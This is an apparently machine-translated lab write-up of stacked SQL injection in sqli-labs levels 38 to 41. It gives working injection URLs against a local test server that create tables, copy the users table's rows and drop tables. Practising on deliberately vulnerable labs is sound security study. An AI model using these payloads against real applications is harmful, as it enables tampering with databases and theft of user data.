Stack injection
Stacked injections: a stack injection
From the meaning of the term, you can see should be performed together with a bunch of sql statement (multiple). And in a real application in the same way, we know that in mysql, mainly on the command line, the end of each statement added; indicates the end of the statement. So we thought, is not it can be used with multi-sentence. This is called stacked injection.
It simply is injected into stacked we execute a sentence, plus a sentence at the end of a sentence, ending semicolon.
Reference Links: https://www.cnblogs.com/lcamry/p/5762905.html
Less-38
First, a test injection point, this clearance is found wrapped single quotes
We try to use the stack injection, before that first open the MySQL command line, show tables to view the original command line
Stack injection use, a new table
http://127.0.0.1/sqli-labs-master/Less-38/?id=1' union select 1,2,3; create table lxk like users;--+
Open a command line and found a successfully created
Delete the new table
http://127.0.0.1/sqli-labs-master/Less-38/?id=1'; drop table lxk ;--+
Less-39
No parcel
In addition to parcel this off is not the same, and 38 others were off the same
http://127.0.0.1/sqli-labs-master/Less-39/?id=1;create table lxk39 like users;insert into lxk39 select * from users;--+
The same method can delete it
Less-40
Using this off ( '1') wrapped, the other was the first off the same 38
Less-41
This off without the package, not an error, the other 38 were the first off the same.